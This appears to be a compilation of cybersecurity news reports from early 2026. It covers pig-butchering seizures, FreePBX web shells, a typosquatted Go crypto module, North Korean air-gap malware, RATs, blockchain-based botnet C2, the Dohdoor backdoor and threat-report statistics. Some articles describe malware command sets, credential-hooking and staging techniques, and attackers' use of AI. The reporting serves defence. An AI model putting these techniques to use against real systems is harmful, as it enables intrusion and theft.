2026-02-28 AI创业新闻

DoJ Seizes $61 Million in Tether Linked to Pig Butchering Crypto Scams

The U.S. Department of Justice (DoJ) this week announced the seizure of $61 million worth of Tether that were allegedly associated with bogus cryptocurrency schemes known as pig butchering . The confiscated funds were traced to cryptocurrency addresses used for the laundering of criminally derived proceeds stolen from victims of cryptocurrency investment scams, the department added. “Criminal actors and professional money launderers use cyber-enabled fraud schemes to swindle their victims and conceal their ill-gotten gains,” said HSI Charlotte Acting Special Agent in Charge Kyle D.

Burns. “HSI special agents work diligently to trace the illicit proceeds of crime across the globe to disrupt and dismantle the transnational criminal organizations that seek to defraud hardworking Americans.” As is the norm in such cybercrime operations, threat actors are known to target individuals by cultivating romantic relationships after approaching them on dating and social media messaging apps. These activities are carried out by individuals who are trafficked into scam compounds operating primarily in Southeast Asia with promises of high-paying jobs. The cybercrime syndicates behind the scams then confiscate their passports and are coerced into conning victims online by posing as charming strangers or brokers on investment platforms, or face brutal consequences.

The end goal is to coax unsuspecting users into parting with their hard-earned money in fraudulent cryptocurrency investment schemes. According to the DoJ, the fake platforms displayed made-up investment portfolios displaying unusually high returns in a deliberate attempt to make victims invest more of their funds. The reality hits when users try to withdraw their funds, at which point they are asked to pay an extra fee as a way to extract even more money from them. “Once the victims’ money transferred to a cryptocurrency wallet under the scammers’ control, the crooks quickly routed that money through many other wallets to hide the nature, source, control, and ownership of that stolen money,” the department added.

In a coordinated announcement, Tether said it has frozen around $4.2 billion in assets linked to illicit activity to date, including nearly $250 million related to scam networks since June 2025 alone. Found this article interesting? Follow us on Google News , Twitter and LinkedIn to read more exclusive content we post.

900+ Sangoma FreePBX Instances Compromised in Ongoing Web Shell Attacks

The Shadowserver Foundation has revealed that over 900 Sangoma FreePBX instances still remain infected with web shells as part of attacks that exploited a command injection vulnerability starting in December 2025. Of these, 401 instances are located in the U.S., followed by 51 in Brazil, 43 in Canada, 40 in Germany, and 36 in France. The non-profit entity said the compromises are likely accomplished via the exploitation of CVE-2025-64328 (CVSS score: 8.6), a high-severity security flaw that could enable post-authentication command injection. “The impact is that any user with access to the FreePBX Administration panel could leverage this vulnerability to execute arbitrary shell commands on the underlying host,” FreePBX said in an advisory for the flaw in November 2025.

“An attacker could leverage this to obtain remote access to the system as the asterisk user.” The vulnerability affects FreePBX versions higher than and including 17.0.2.36. It was resolved in version 17.0.3. As mitigations, it’s advised to add security controls to ensure that only authorized users have access to the FreePBX Administrator Control Panel (ACP), restrict access from hostile networks to the ACP, and update the filestore module to the latest version. The vulnerability has since come under active exploitation in the wild, prompting the U.S.

Cybersecurity and Infrastructure Security Agency (CISA) to add it to its Known Exploited Vulnerabilities (KEV) catalog earlier this month. Source: The Shadowserver Foundation In a report published late last month, Fortinet FortiGuard Labs revealed that the threat actor behind the cyber fraud operation codenamed INJ3CTOR3 has been exploiting CVE-2025-64328 starting early December 2025 to deliver a web shell codenamed EncystPHP. “By leveraging Elastix and FreePBX administrative contexts, the web shell operates with elevated privileges, enabling arbitrary command execution on the compromised host and initiating outbound call activity through the PBX environment,” the cybersecurity company noted. FreePBX users are recommended to update their FreePBX deployments to the latest version as soon as possible to counter active threats.

Found this article interesting? Follow us on Google News , Twitter and LinkedIn to read more exclusive content we post.

Malicious Go Crypto Module Steals Passwords, Deploys Rekoobe Backdoor

Cybersecurity researchers have disclosed details of a malicious Go module that’s designed to harvest passwords, create persistent access via SSH, and deliver a Linux backdoor named Rekoobe. The Go module, github[.]com/xinfeisoft/crypto, impersonates the legitimate “golang.org/x/crypto” codebase, but injects malicious code that’s responsible for exfiltrating secrets entered via terminal password prompts to a remote endpoint, fetches a shell script in response, and executes it. “This activity fits namespace confusion and impersonation of the legitimate golang.org/x/crypto subrepository (and its GitHub mirror github.com/golang/crypto),” Socket security researcher Kirill Boychenko said . “The legitimate project identifies go.googlesource.com/crypto as canonical and treats GitHub as a mirror, a distinction the threat actor abuses to make github.com/xinfeisoft/crypto look routine in dependency graphs.” Specifically, the backdoor has been placed within the “ssh/terminal/terminal.go” file, so that every time a victim application invokes ReadPassword() – a function supposedly meant to read input like passwords from a terminal – it causes that information to capture interactive secrets.

The main responsibility of the downloaded script is to function as a Linux stager, appending a threat actor’s SSH key to the “/home/ubuntu/.ssh/authorized_keys” file, set iptables default policies to ACCEPT in an attempt to loosen firewall restrictions, and retrieve additional payloads from an external server while disguising them with the .mp5 extension. Of the two payloads, one is a helper that tests internet connectivity and attempts to communicate with an IP address (“154.84.63[.]184”) over TCP port 443. The program likely functions as a recon or loader, Socket noted. The second downloaded payload has been assessed to be Rekoobe, a known Linux trojan that has been detected in the wild since at least 2015 .

The backdoor is capable of receiving commands from an attacker-controlled server to download more payloads, steal files, and execute a reverse shell. As recently as August 2023, Rekoobe has been put to use by Chinese nation-state groups like APT31 . While the package still remains listed on pkg.go.dev, the Go security team has taken steps to block the package as malicious. “This campaign will likely repeat because the pattern is low-effort and high-impact: a lookalike module that hooks a high-value boundary (ReadPassword), uses GitHub Raw as a rotating pointer, then pivots into curl | sh staging and Linux payload delivery,” Boychenko said.

“Defenders should anticipate similar supply chain attacks targeting other ‘credential edge’ libraries (SSH helpers, CLI auth prompts, database connectors) and more indirection through hosting surfaces to rotate infrastructure without republishing code.” Found this article interesting? Follow us on Google News , Twitter and LinkedIn to read more exclusive content we post.

How to Discover Shadow AI [Free Guide]

ScarCruft Uses Zoho WorkDrive and USB Malware to Breach Air-Gapped Networks

The North Korean threat actor known as ScarCruft has been attributed to a fresh set of tools, including a backdoor that uses Zoho WorkDrive for command-and-control (C2) communications to fetch more payloads and an implant that uses removable media to relay commands and breach air-gapped networks. The campaign, codenamed Ruby Jumper by Zscaler ThreatLabz, involves the deployment of malware families, such as RESTLEAF, SNAKEDROPPER, THUMBSBD, VIRUSTASK, FOOTWINE, and BLUELIGHT to facilitate surveillance on a victim’s system. It was discovered by the cybersecurity company in December 2025. “In the Ruby Jumper campaign, when a victim opens a malicious LNK file, it launches a PowerShell command and scans the current directory to locate itself based on file size,” security researcher Seongsu Park said .

“Then, the PowerShell script launched by the LNK file carves multiple embedded payloads from fixed offsets within that LNK, including a decoy document, an executable payload, an additional PowerShell script, and a batch file.” One of the lure documents used in the campaign displays an article about the Palestine-Israel conflict that’s translated from a North Korean newspaper into Arabic. All three remaining payloads are used to progressively move the attack to the next stage, with the batch script launching PowerShell, which, in turn, is responsible for loading shellcode containing the payload after decrypting it. The Windows executable payload, named RESTLEAF, is spawned in memory, and uses Zoho WorkDrive for C2, marking the first time the threat actor has abused the cloud storage service in its attack campaigns. Once it’s successfully authenticated with the Zoho WorkDrive infrastructure by means of a valid access token, RESTLEAF downloads shellcode, which is then executed via process injection, eventually leading to the deployment of SNAKEDROPPER, which installs the Ruby runtime, sets up persistence using a scheduled task, and drops THUMBSBD and VIRUSTASK.

THUMBSBD, which is disguised as a Ruby file and uses removable media to relay commands and transfer data between internet-connected and air-gapped systems. It’s capable of harvesting system information, downloading a secondary payload from a remote server, exfiltrating files, and executing arbitrary commands. If the presence of any removable media is detected, the malware creates a hidden folder and uses it to stage operator-issued commands or store execution output. One of the payloads delivered by THUMBSBD is FOOTWINE, an encrypted payload with an integrated shellcode launcher that comes fitted with keylogging and audio and video capturing capabilities to conduct surveillance.

It communicates with a C2 server using a custom binary protocol over TCP. The complete set of commands supported by the malware is as follows - sm , for interactive command shell fm , for file and directory manipulation gm , for managing plugins and configuration rm , for modifying the Windows Registry pm , for enumerating running processes dm , for taking screenshots and captures keystrokes cm , for performing audio and video surveillance s_d , for receiving batch script contents from C2 server, saving it to the file %TEMP%\SSMMHH_DDMMYYYY.bat, and executing it pxm , for setting up a proxy connection and relaying traffic bidirectionally. [filepath] , for loading a given DLL THUMBSBD is also designed to distribute BLUELIGHT , a backdoor previously attributed to ScarCruft since at least 2021. The malware weaponizes legitimate cloud providers, including Google Drive, Microsoft OneDrive, pCloud, and BackBlaze, for C2 to run arbitrary commands, enumerate the file system, download additional payloads, upload files, and remove itself.

Also delivered as a Ruby file, VIRUSTASK functions similar to THUMBSBD in that it acts as a removable media propagation component to spread the malware to non-infected air-gapped systems. “Unlike THUMBSBD which handles command execution and exfiltration, VIRUSTASK focuses exclusively on weaponizing removable media to achieve initial access on air-gapped systems,” Park explained. “The Ruby Jumper campaign involves a mult-stage infection chain that begins with a malicious LNK file and utilizes legitimate cloud services (like Zoho WorkDrive, Google Drive, Microsoft OneDrive, etc.) to deploy a novel, self-contained Ruby execution environment,” Park said. “Most critically, THUMBSBD and VIRUSTASK weaponize removable media to bypass network isolation and infect air-gapped systems.” Found this article interesting?

Trojanized Gaming Tools Spread Java-Based RAT via Browser and Chat Platforms

Threat actors are luring unsuspecting users into running trojanized gaming utilities that are distributed via browsers and chat platforms to distribute a remote access trojan (RAT). “A malicious downloader staged a portable Java runtime and executed a malicious Java archive (JAR) file named jd-gui.jar,” the Microsoft Threat Intelligence team said in a post on X. “This downloader used PowerShell and living-off-the-land binaries (LOLBins) like cmstp.exe for stealthy execution.” The attack chain is also designed to evade detection by deleting the initial downloader and by configuring Microsoft Defender exclusions for the RAT components. Persistence is achieved by means of a scheduled task and Windows startup script named “world.vbs,” before the final payload is deployed on the compromised host.

The malware, per Microsoft, is a “multi-purpose malware” that acts as a loader, runner, downloader, and RAT. Once launched, it connects to an external server at “79.110.49[.]15” for command-and-control (C2) communications, allowing it to exfiltrate data and deploy additional payloads. As ways to defend against the threat, users are advised to audit Microsoft Defender exclusions and scheduled tasks, remove malicious tasks and startup scripts, isolate affected endpoints, and reset credentials for users active on compromised hosts. The disclosure comes as BlackFog disclosed details of a new Windows RAT malware family called Steaelite that was first advertised on criminal forums in November 2025 as a “best Windows RAT” with “fully undetectable” (FUD) capabilities.

It’s compatible with both Windows 10 and 11. Unlike other off-the-shelf RATs sold to criminal actors, Steaelite bundles together data theft and ransomware, packaging them into one web panel, with an Android ransomware module on the way. The panel also incorporates various developer tools to facilitate keylogging, client-to-victim chat, file searching, USB spreading, wallpaper modification, UAC bypass, and clipper functionality . Other notable features include removing competing malware, disabling Microsoft Defender, or configuring exclusions, and installing persistence methods.

As for its main capabilities, Steaelite RAT supports remote code execution, file management, live streaming, webcam and microphone access, process management, clipboard monitoring, password theft, installed program enumeration, location tracking, arbitrary file execution, URL opening, DDoS attacks, and VB.NET payload compilation. “The tool gives operators browser-based control over infected Windows machines, covering remote code execution, credential theft, live surveillance, file exfiltration, and ransomware deployment from a single dashboard,” security researcher Wendy McCague said . “A single threat actor can browse files, exfiltrate documents, harvest credentials, and deploy ransomware from the same dashboard. This enables complete double extortion from one tool.” In recent weeks, threat hunters have also discovered two new RAT families tracked as DesckVB RAT and KazakRAT that enable comprehensive remote control over infected hosts and even selectively deploy capabilities post-compromise.

According to Ctrl Alt Intel, KazakRAT is suspected to be the work of a suspected state-affiliated cluster targeting Kazakh and Afghan entities as part of a persistent campaign ongoing since at least August 2022. Found this article interesting? Follow us on Google News , Twitter and LinkedIn to read more exclusive content we post.

Meta Files Lawsuits Against Brazil, China, Vietnam Advertisers Over Celeb-Bait Scams

Meta on Thursday said it’s taking legal action to tackle scams on its platforms by filing lawsuits against what it calls deceptive advertisers based in Brazil, China, and Vietnam. As part of the effort, the advertisers’ methods of payment have been suspended, related accounts have been disabled, and the website domain names used to pull off the scams have been blocked. Concurrently, the social media giant said it has also issued cease and desist letters to eight marketing consultants who advertised the ability to bypass its ad policy enforcement systems. This included fake “un-ban” or account restoration services and renting access to trusted accounts so as to help clients bypass its controls.

At least three advertisers, two from Brazil and one from China, were found to engage in celeb-bait scams, which often involve misusing the image of well-known figures to trick people into clicking on bogus ads that lead to scam sites. These websites are designed to harvest sensitive data or dupe unsuspecting users into sending money or investing in fake platforms. The three advertisers against whom Meta has filed lawsuits are listed below - Brazil-based Vitor Lourenço de Souza and Milena Luciani Sanchez are being sued for using altered images and voices of celebrities to promote fraudulent healthcare products. Brazil-based B&B Suplementos e Cosméticos Ltda.

(Brites Corp), Brites Academia de Treinamento Ltda., Daniel de Brites Macieira Cordeiro, and José Victor de Brites Chaves de Araújo for being part of a scam operation that leveraged synthetic imagery of a prominent physician to advertise healthcare products without regulatory approval and sold courses teaching the same tactics. China-based Shenzhen Yunzheng Technology Co., Ltd for using celeb-bait ads to target people in various countries, including the U.S. and Japan, as part of a fraud scheme designed to lure them into joining investment groups. “To fight celeb-bait scams, we developed protections for celebrities whose images are repeatedly used in these schemes,” Meta said.

“This program currently protects the images of more than 500,000 celebrities and public figures around the world.” In addition, the company noted that it sued Vietnam-based advertiser Lý Văn Lâm for using cloaking techniques to get around its review process. Cloaking refers to an adversarial technique that aims to conceal the true nature of a website linked to an ad in an attempt to fool ad review systems by serving one version of its content during the review and showing an entirely different and malicious content to real users. In this case, the advertiser is said to have used scam ads to offer discounted items from well-known brands in exchange for completing a survey. People who interacted with these ads were taken to phony websites where they were asked to enter credit card information to purchase items that were never delivered.

Their credit cards also incurred unauthorized, recurring fees, a practice known as subscription fraud. The development comes months after a Reuters investigation found that 19% of Meta’s $18 billion in ad sales in China in 2024 came from ads for scams, illegal gambling, pornography, and other banned content. The report also uncovered agencies that allow businesses to run banned advertisements, prompting the company to put its Badged Partners program under review. In an analysis of 14.5 million ads running on Meta platforms across the E.U.

and U.K. over a 23-day period, Gen Digital found that nearly one in three of those ads (about 30.99%) pointed to a scam, phishing, or malware link. “In total, scam ads generated more than 300 million impressions in less than a month,” the cybersecurity company said earlier this month. “The activity was highly concentrated, with just 10 advertisers responsible for over 56% of all observed scam ads.

Repeated campaign clusters were traced to shared payment and infrastructure linked to China and Hong Kong, indicating organized, industrial-scale operations rather than isolated bad actors.” These findings also coincide with the discovery of malicious infrastructure and underground services that have been used to peddle various kinds of scams - Scams have been found to combine malvertising and pig butchering fraud models to defraud victims, primarily those in Japan, by tricking them into clicking on investment-themed ads on social media. These ads redirect victims to websites that prompt them to engage with a supposed expert via messaging apps by scanning a QR code. Once victims are added to one-on-one and group chats with these so-called experts, who are nothing but artificial intelligence (AI)-powered chatbots in some cases, they are persuaded to invest progressively larger amounts of money, only to demand a “release fee” to unlock non-existent profits. More than 23,000 domains within this ecosystem have been discovered.

Threat actors are compromising routers to alter DNS settings to use shadow resolvers hosted in Aeza International , a bulletproof hosting company (BPH) sanctioned by the U.S. Government in July 2025. This unauthorized modification is engineered to selectively alter DNS responses associated with Okta and Shopify, allowing the operators to direct users to scam and malware content by means of an HTTP-based traffic distribution system (TDS). A malicious push notification network has been observed using a network of malicious domains to target Android Chrome users all over the world with a steady stream of unwanted push notifications (e.g., “Android infected with malware!” or “System needs a scan”) after obtaining permissions in a bid to direct to scam sites and adult content.

According to data from Infoblox, Bangladesh, India, Indonesia, and Pakistan represented 50% of all the traffic. A network of over 150 cloned, fake websites has been identified impersonating real law firms based in the U.S. and the U.K., and targeting users looking for legal advice and representation to promote a business impersonation scam. “The sites used the firm’s name, branding, and publicly available attorney identities, presenting themselves as legitimate legal and asset-recovery services, offering to help victims recover funds lost to prior fraud,” Sygnia said .

“The campaign targeted individuals who had already suffered financial fraud.” The proliferation of scams , fueled by a booming pig butchering‑as‑a‑service ( PBaaS ) economy, has not escaped law enforcement’s attention, as evidenced by the dismantling of scam compounds in Southeast Asia in recent months . Earlier this month, the Cambodian government promised to crack down and dismantle cyber scam networks operating within its borders, adding that police officials launched 48 operations in the first nine months of 2025 to combat cyber fraud, arrested 168 people, and deported 2,722 people back to their home countries. The ongoing efforts have cut scam activity in half since the start of this year, Senior Minister Chhay Sinarith, chairman of the Secretariat of the Commission for Combating Technology Crimes, was quoted as saying this week. Cambodian Prime Minister Hun Manet also acknowledged that online scam centres operating in the country are damaging its reputation and undermining its economy.

Found this article interesting? Follow us on Google News , Twitter and LinkedIn to read more exclusive content we post.

Aeternum C2 Botnet Stores Encrypted Commands on Polygon Blockchain to Evade Takedown

Cybersecurity researchers have disclosed details of a new botnet loader called Aeternum C2 that uses a blockchain-based command-and-control (C2) infrastructure to make it resilient to takedown efforts. “Instead of relying on traditional servers or domains for command-and-control, Aeternum stores its instructions on the public Polygon blockchain,” Qrator Labs said in a report shared with The Hacker News. “This network is widely used by decentralized applications, including Polymarket, the world’s largest prediction market. This approach makes Aeternum’s C2 infrastructure effectively permanent and resistant to traditional takedown methods.” This is not the first time botnets have been found relying on blockchain for C2.

In 2021, Google said it took steps to disrupt a botnet known as Glupteba that uses the Bitcoin blockchain as a backup C2 mechanism to fetch the actual C2 server address. Details of Aeternum C2 first emerged in December 2025, when Outpost24’s KrakenLabs revealed that a threat actor by the name of LenAI was advertising the malware on underground forums for $200 that grants customers access to a panel and a configured build. For $4,000, customers were allegedly promised the entire C++ codebase along with updates. A native C++ loader available in both x32 and x64 builds, the malware works by writing commands to be issued to the infected host to smart contracts on the Polygon blockchain.

The bots then read those commands by querying public remote procedure call (RPC) endpoints. All of this is managed via the web-based panel, from where customers can select a smart contract, choose a command type, specify a payload URL and update it. The command, which can target all endpoints or a specific one, is written into the blockchain as a transaction, after which it becomes available to every compromised device that’s polling the network. “Once a command is confirmed, it cannot be altered or removed by anyone other than the wallet holder,” Qrator Labs said.

“The operator can manage multiple smart contracts simultaneously, each one potentially serving a different payload or function, such as a clipper, a stealer, a RAT, or a miner.” According to a two-part research published by Ctrl Alt Intel earlier this month, the C2 panel is implemented as a Next.js web application that allows operators to deploy smart contracts to the Polygon blockchain. The smart contracts contain a function that, when called by the malware via the Polygon RPC, causes it to return the encrypted command that’s subsequently decoded and run on the victim machines. Besides using the blockchain to turn it into a takedown-resistant botnet, the malware packs in various anti-analysis features to extend the lifespan of infections. This includes checks to detect virtualized environments, in addition to equipping customers with the ability to scan their builds via Kleenscan to ensure that they are not flagged by antivirus vendors.

“The operational costs are negligible: $1 worth of MATIC, the native token of the Polygon network, is enough for 100 to 150 command transactions,” the Czechian cybersecurity vendor said. “The operator doesn’t need to rent servers, register domains, or maintain any infrastructure beyond a crypto wallet and a local copy of the panel.” The threat actor has since attempted to sell the entire toolkit for an asking price of $10,000, claiming a lack of time for support and their involvement in another project. “I will sell the entire project to one person with permission for resale and commercial use, with all ‘rights,’” LenAI wrote in a dark web forum post. “I will also give useful tips/notes on development that I did not have time to implement.” It’s worth noting that LenAI is also behind a second crimeware solution called ErrTraffic that enables threat actors to automate ClickFix attacks by generating fake glitches on compromised websites to induce a false sense of urgency and deceive users into following malicious instructions.

The disclosure comes as Infrawatch published details of an underground service that deploys dedicated laptop hardware into American homes to co-opt the devices into a residential proxy network named DSLRoot that redirects malicious traffic through them. The hardware is designed to run a Delphi-based program called DSLPylon that’s equipped with capabilities to enumerate supported modems on the network, as well as remotely control the residential networking equipment and Android devices via an Android Debug Bridge ( ADB ) integration. “Attribution analysis identifies the operator as a Belarusian national with residential presence in Minsk and Moscow,” Infrawatch said . “DSLRoot is estimated to operate roughly 300 active hardware devices across 20+ U.S.

states.” The operator has been identified as Andrei Holas (aka Andre Holas and Andrei Golas), with the service promoted on BlackHatWorld by a user operating under the alias GlobalSolutions, claiming to offer physical residential ADSL proxies for sale for $190 per month for unrestricted access. It is also available for $990 for six months and $1,750 for annual subscriptions. “DSLRoot’s custom software provides automated remote management of consumer modems (ARRIS/Motorola, Belkin, D-Link, ASUS) and Android devices via ADB, enabling IP address rotation and connectivity control,” the company noted. “The network operates without authentication, allowing clients to route traffic anonymously through U.S.

residential IPs.” Found this article interesting? Follow us on Google News , Twitter and LinkedIn to read more exclusive content we post.

UAT-10027 Targets U.S. Education and Healthcare with Dohdoor Backdoor

A previously undocumented threat activity cluster has been attributed to an ongoing malicious campaign targeting education and healthcare sectors in the U.S. since at least December 2025. The campaign is being tracked by Cisco Talos under the moniker UAT-10027 . The end goal of the attacks is to deliver a never-before-seen backdoor codenamed Dohdoor.

“Dohdoor utilizes the DNS-over-HTTPS (DoH) technique for command-and-control (C2) communications and has the ability to download and execute other payload binaries reflectively,” security researchers Alex Karkins and Chetan Raghuprasad said in a technical report shared with The Hacker News. Although the initial access vector used in the campaign is currently not known, it’s suspected to involve the use of social engineering phishing techniques, leading to the execution of a PowerShell script. The script then proceeds to download and run a Windows batch script from a remote staging server, which, for its part, facilitates the download of a malicious Windows dynamic-link library (DLL) that’s named “propsys.dll” or “batmeter.dll.” The DLL payload – i.e., Dohdoor – is launched by means of a legitimate Windows executable (e.g., “Fondue.exe,” “mblctr.exe,” and “ScreenClippingHost.exe”) using a technique referred to as DLL side-loading . The backdoored access created by the implant is used to retrieve a next-stage payload directly into the victim’s memory and execute it.

The payload is assessed to be a Cobalt Strike Beacon. “The threat actor hides the C2 servers behind the Cloudflare infrastructure, ensuring that all outbound communication from the victim machine appears as legitimate HTTPS traffic to a trusted global IP address,” Talos said. “This technique bypasses DNS-based detection systems, DNS sinkholes, and network traffic analysis tools that monitor suspicious domain lookups, ensuring that the malware’s C2 communications remain stealth by traditional network security infrastructure.” Dohdoor has also been found to unhook system calls to bypass endpoint detection and response (EDR) solutions that monitor Windows API calls through user-mode hooks in NTDLL.dll . Raghuprasad told The Hacker News that, “the attacker had infected several educational institutions, including a university that is connected to several other institutions, indicating a potential wider attack surface.

Additionally, one of the affected entities was a healthcare facility, specifically for elderly care.” Analysis of the campaign has revealed no evidence of data exfiltration to date. Although no final payloads have been observed other than what appears to be the Cobalt Strike Beacon to backdoor into the victim’s environment, it’s believed that UAT-10027’s actions are likely driven by financial gain based on the victimology pattern, the researcher added. There is currently no clarity on who is behind UAT-10027, but Cisco Talos said it found some tactical similarities between Dohdoor and LazarLoader , a downloader previously identified as used by the North Korean hacking group Lazarus in attacks aimed at South Korea. “While UAT-10027’s malware shares technical overlaps with the Lazarus Group, the campaign’s focus on the education and health care sectors deviates from Lazarus’ typical profile of cryptocurrency and defense targeting,” Talos concluded.

“However, […] North Korean APT actors have targeted the healthcare sector using Maui ransomware , and another North Korean APT group, Kimsuky , has targeted the education sector , highlighting the overlaps in the victimology of UAT-10027 with that of other North Korean APTs.” Found this article interesting? Follow us on Google News , Twitter and LinkedIn to read more exclusive content we post.

ThreatsDay Bulletin: Kali Linux + Claude, Chrome Crash Traps, WinRAR Flaws, LockBit & 15+ Stories

Nothing here looks dramatic at first glance. That’s the point. Many of this week’s threats begin with something ordinary, like an ad, a meeting invite, or a software update. Behind the scenes, the tactics are sharper.

Access happens faster. Control is established sooner. Cleanup becomes harder. Here is a quick look at the signals worth paying attention to.

AI-powered command execution Kali Linux Integrates Claude AI Assistant via MCP Kali Linux, an advanced penetration testing Linux distribution used for ethical hacking and network security assessments, has added an integration with Anthropic’s Claude large language model through the Model Context Protocol (MCP) to issue commands in natural language and translate them into technical commands. Belarus-linked Android spyware ResidentBat Infrastructure Analyzed ResidentBat is an Android spyware implant used by Belarusian authorities for surveillance operations against journalists and civil society. Once installed, it provides operators with access to call logs, microphone recordings, SMS, encrypted messenger traffic, screen captures, and locally stored files. The malware, although first documented in December 2025, is assessed to date back to 2021.

According to Censys, ResidentBat-associated infrastructure is concentrated in Europe and Russia: the Netherlands (5 hosts), Germany (2 hosts), Switzerland (2 hosts), and Russia (1 host) in a recent Platform view, using a narrow port range (7000-7257) for control traffic. Crypto phishing wave Phishing Campaigns Impersonate Bitpanda Phishing campaigns are impersonating cryptocurrency brokerage services like Bitpanda to harvest sensitive data under the pretext of reconfirming their information or risk having their accounts blocked. “Attempting to get multiple forms of information and identification, the attackers used tactics that would seem legitimate to the everyday user,” Cofense said . “User information such as name verification, email, and password credentials, and location were all used in this attempt to harvest information under the guise of a multi-factor authentication process.” Breakout times shrink Adversaries Get Faster in 2025 In its 2026 Global Threat Report, CrowdStrike said adversaries became faster than ever before in 2025.

“The average e-crime breakout time — the period between initial access and lateral movement onto another system — dropped to 29 minutes, a 65% increase in speed from 2024,” the company said . One such intrusion undertaken by Luna Moth (aka Chatty Spider) targeting a law firm moved from initial access to data exfiltration in four minutes. Chief among the factors fueling this dramatic acceleration was the widespread abuse of legitimate credentials, which allowed attackers to blend into normal network traffic and bypass many traditional security controls. This was coupled with threat actors of varied motivations utilizing AI technology to accelerate and optimize their existing techniques.

Some of the threat actors that have leveraged AI in their operations include Fancy Bear , Punk Spider (aka Akira), Blind Spider (aka Blind Eagle), Odyssey Spider (aka TA558), and an India-nexus hacking group called Frantic Tiger that has used Netlify and Cloudflare pages for credential-harvesting operations. The cybersecurity company said it observed an 89% increase in the number of attacks by AI-enabled adversaries compared to 2024 and a 42% year-over-year increase in zero-days exploited prior to public disclosure. In tandem, 67% of vulnerabilities exploited by China-nexus adversaries provided immediate system access, and 40% targeted edge devices that typically lack comprehensive monitoring. The vast majority of attacks, 82%, were free of malware — highlighting attackers’ enduring shift toward hands-on-keyboard operations and the abuse of legitimate tools and credentials.

4-minute lateral movement Fastest Attacker Breakout Time Drops to 4 Minutes In a similar report, ReliaQuest said the fastest intrusions reached lateral movement in just 4 minutes, an 85% acceleration from last year, with data exfiltration taking place in 6 minutes. The statistic is fueled by attackers increasingly weaving AI and automation into their tradecraft. “As attackers increasingly secure valid credentials with elevated privileges, the time to react has drastically dropped,” ReliaQuest said . “In 2025, the average breakout time (initial access to lateral movement) dropped to 34 minutes.

In 47% of incidents, they secured high privileges before ever touching the network. This allows them to skip escalation, blend into traffic, and repurpose legitimate tools.” ClickFix fuels Mac stealers Mac Users Targeted by Stealer Malware Using ClickFix Mac users searching for popular software like Homebrew, 7-Zip, Notepad++, LibreOffice, and Final Cut Pro are the target of an active malvertising campaign powered by at least 35 hijacked Google advertiser accounts originating from countries including the U.S., Canada, Italy, Poland, Brazil, India, Saudi Arabia, Japan, China, Romania, Malta, Slovenia, Germany, the U.K., and the U.A.E. More than 200 malicious advertisements impersonating legitimate macOS software have been found. The end goal of these efforts is to direct users to fake pages that contain ClickFix -like instructions to deliver MacSync stealer.

Another ClickFix campaign has been observed using fake CAPTCHA verification lures on bogus phishing pages to distribute stealer malware that can harvest data from web browsers, gaming apps like Steam, cryptocurrency wallets, and VPN apps. According to ReliaQuest data, a quarter of attacks used social engineering for initial access last year, with ClickFix responsible for delivering 59% of the top malware families. Encryption debate resurfaces Meta Executive Warned Against Encryption in Messenger and Instagram Meta went ahead with a plan to encrypt the messaging services connected to its Facebook and Instagram apps despite internal warnings that it would hinder the social media giant’s ability to flag child-exploitation cases to law enforcement, Reuters reported . The internal chat exchange dated March 2019 was filed in connection with a lawsuit brought by the U.S.

state of New Mexico, accusing it of exposing children and teens to sexual exploitation on its platforms and profiting from it. In response to the concerns raised, Meta said it worked on additional safety features before it launched encrypted messaging on Facebook and Instagram in 2023. ActiveMQ flaw aids LockBit Apache ActiveMQ Exploit Leads to LockBit Ransomware Threat actors are exploiting a now-patched security flaw in internet-facing Apache ActiveMQ servers ( CVE-2023-46604 ) to deploy LockBit ransomware. “Despite being evicted after the initial intrusion, they successfully breached the same server on a second occasion 18 days later,” The DFIR Report said .

“After compromising the server, the threat actor used Metasploit, possibly along with Meterpreter, to perform post-exploitation activities. These activities included escalating privileges, accessing LSASS process memory, and moving laterally across the network. After regaining access following their eviction, the threat actor swiftly transitioned to deploying ransomware. They leveraged credentials extracted during their previous breach to deploy LockBit ransomware via RDP.” The ransomware is suspected to be crafted using the leaked LockBit builder .

Chrome crash-to-command trick CrashFix Variants Detailed Two newly flagged Google Chrome extensions, Pixel Shield - Block Ads (ID: nlogodaofdghipmbdclajkkpheneldjd) and PageGuard - Phishing Protection (ID: mlaonedihngoginmmlaacpihnojcoocl), have been found to adopt the same playbook as CrashFix , where the browser is deliberately crashed, and the user is tricked into running a malicious command à la ClickFix. The most concerning aspect of this campaign is that the extensions actually work and offer the advertised functionality. “The original NexShield DoS created a billion chrome.runtime.connect() calls,” Annex Security’s John Tuckner said . “These variants use a different technique I’m calling the Promise Bomb because it crashes the browser by flooding Chrome’s message passing system with millions of unresolvable promises.” While the original NexShield used timer-based activation, the new variants have evolved to push notification-based command-and-control (C2), causing the denial-of-service to be triggered only when the C2 server sends a push notification containing a “newVersion” value ending in “2.” This, in turn, gives the attacker selective remote control over when the crashes happen.

WinRAR patch lag persists Widespread Exposure to CVE-2025-8088 Cybersecurity firm Stairwell said more than 80% of the IT networks it monitors run versions of WinRAR vulnerable to CVE-2025-8088 , a vulnerability that has been widely exploited by cybercrime and cyber espionage groups. “This finding underscores a persistent challenge in enterprise security when widely deployed, trusted software that quietly falls out of date and becomes a high-value target for attackers,” Alex Hegyi said . Crypto IV reuse risk Open-Source Projects Use Crypto Libraries with Insecure Defaults A new analysis from Trail of Bits has revealed that more than 723,000 open-source projects use cryptographic libraries with insecure defaults. The aes-js and pyaes libraries have been found to provide a default initialization vector (IV) in their AES-CTR API, leading to a large number of key/IV reuse bugs.

“Reusing a key/IV pair leads to serious security issues: if you encrypt two messages in CTR mode or GCM with the same key and IV, then anybody with access to the ciphertexts can recover the XOR of the plaintexts, and that’s a very bad thing,” Trail of Bits said . While neither library has been updated in years, strongSwan has released an update to address the problem in strongMan ( CVE-2026-25998 ). AI audits smart contracts OpenAI Teams Up with Paradigm for EVMbench OpenAI and Paradigm have jointly announced EVMbench, a benchmark that measures how well AI agents can detect, exploit, and patch high-severity smart contract vulnerabilities. “EVMbench draws on 120 curated vulnerabilities from 40 audits, with most sourced from open code audit competitions,” OpenAI said .

“EVMbench is intended both as a measurement tool and as a call to action. As agents improve, it becomes increasingly important for developers and security researchers to incorporate AI-assisted auditing into their workflows.” Fake FSB extortion plot Moscow Man Accused of Impersonating FSB to Extort Conti Gang A Russian national has been accused of trying to extort money from the notorious Conti ransomware group by posing as an officer of Russia’s Federal Security Service (FSB), according to local media reports. RBC reported that the suspect, Ruslan Satuchin, posed as an FSB officer and demanded a large payment from Conti. Although an investigation was formally launched in September 2025, the incident allegedly began in September 2022 when Satuchin contacted one of the members of the hacker group and extorted them to avoid criminal liability.

